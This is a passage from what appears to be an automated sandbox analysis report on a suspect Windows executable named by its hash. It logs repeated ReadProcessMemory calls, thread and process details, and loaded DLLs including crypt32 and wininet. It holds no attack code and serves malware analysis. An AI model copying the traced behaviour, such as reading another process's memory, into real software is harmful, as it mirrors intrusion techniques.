hProcess=0x2f0, lpBaseAddress=0xbd000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.206] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xbe000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.206] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xbf000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.206] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc0000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.207] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.207] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc2000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.207] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc3000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.207] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc4000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.207] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc5000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.208] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc6000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.208] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc7000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.208] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc8000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.208] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xc9000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.209] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xca000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.209] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xcb000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.209] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xcc000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.210] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xcd000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.210] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xce000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.210] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xcf000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.210] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd0000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.211] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.211] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd2000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.211] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd3000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.212] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd4000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.212] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd5000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.212] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd6000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.212] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd7000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.213] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd8000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.213] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xd9000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.213] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xda000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.213] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xdb000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.214] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xdc000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.214] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xdd000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.214] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xde000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.214] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xdf000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.214] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe0000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.215] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.215] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe2000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.215] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe3000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.215] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe4000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.216] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe5000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.216] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe6000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.216] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe7000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.216] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe8000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.216] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xe9000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.217] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xea000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.217] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xeb000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.217] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xec000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.218] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xed000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.218] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xee000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.219] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xef000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.219] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf0000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.219] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.219] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf2000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.220] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf3000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.220] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf4000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.220] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf5000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.220] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf6000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.221] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf7000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.221] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf8000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.221] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xf9000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.221] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xfa000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.222] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xfb000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.222] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xfc000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.222] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xfd000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.222] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xfe000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.223] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0xff000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.223] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x100000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.223] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x101000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.223] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x102000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.224] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x103000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.224] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x104000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.224] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x105000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.225] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x106000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.225] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x107000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0171.225] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x108000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 [0175.298] ReadProcessMemory (in: hProcess=0x2f0, lpBaseAddress=0x42f1000, lpBuffer=0x22ba400, nSize=0x1000, lpNumberOfBytesRead=0x19de08 | out: lpBuffer=0x22ba400, lpNumberOfBytesRead=0x19de08) returned 0 Thread: id = 2 os_tid = 0xef0 Thread: id = 3 os_tid = 0xc90 Thread: id = 4 os_tid = 0xb74 [0136.873] CoGetContextToken (in: pToken=0x430fc3c | out: pToken=0x430fc3c) returned 0x800401f0 [0136.873] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0136.873] RoInitialize () returned 0x1 [0136.873] RoUninitialize () returned 0x0 Thread: id = 5 os_tid = 0xd28 Thread: id = 6 os_tid = 0x914 Process: id = "2" image_name = "977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" page_root = "0x489e9000" os_pid = "0x148" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1318" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f024" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 563 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 564 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 565 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 566 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 567 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 568 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 569 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 570 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 571 start_va = 0x400000 end_va = 0x475fff monitored = 1 entry_point = 0x46fdc2 region_type = mapped_file name = "977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") Region: id = 572 start_va = 0x77110000 end_va = 0x7728afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 573 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 574 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 575 start_va = 0x7fff0000 end_va = 0x7ffb2d1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 576 start_va = 0x7ffb2d1c0000 end_va = 0x7ffb2d380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 577 start_va = 0x7ffb2d381000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb2d381000" filename = "" Region: id = 578 start_va = 0x400000 end_va = 0x41cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 579 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 580 start_va = 0x5a1e0000 end_va = 0x5a22ffff monitored = 0 entry_point = 0x5a1f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 581 start_va = 0x5a240000 end_va = 0x5a2b9fff monitored = 0 entry_point = 0x5a253290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 582 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 583 start_va = 0x5a230000 end_va = 0x5a237fff monitored = 0 entry_point = 0x5a2317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 584 start_va = 0x510000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 585 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 586 start_va = 0x75710000 end_va = 0x7588dfff monitored = 0 entry_point = 0x757c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 587 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 588 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 589 start_va = 0x420000 end_va = 0x4ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 590 start_va = 0x75a40000 end_va = 0x75afdfff monitored = 0 entry_point = 0x75a75630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 591 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 592 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 593 start_va = 0x510000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 594 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 595 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 596 start_va = 0x74380000 end_va = 0x743fafff monitored = 0 entry_point = 0x7439e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 597 start_va = 0x758c0000 end_va = 0x75903fff monitored = 0 entry_point = 0x758d9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 598 start_va = 0x75970000 end_va = 0x75a1cfff monitored = 0 entry_point = 0x75984f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 599 start_va = 0x73e40000 end_va = 0x73e5dfff monitored = 0 entry_point = 0x73e4b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 600 start_va = 0x73e30000 end_va = 0x73e39fff monitored = 0 entry_point = 0x73e32a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 601 start_va = 0x77040000 end_va = 0x77097fff monitored = 0 entry_point = 0x770825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 602 start_va = 0x74740000 end_va = 0x748b7fff monitored = 0 entry_point = 0x74798a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 603 start_va = 0x74c30000 end_va = 0x74c3dfff monitored = 0 entry_point = 0x74c35410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 612 start_va = 0x70050000 end_va = 0x7025cfff monitored = 0 entry_point = 0x7013acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 613 start_va = 0x74400000 end_va = 0x745bcfff monitored = 0 entry_point = 0x744e2a10 region_type = mapped_file name 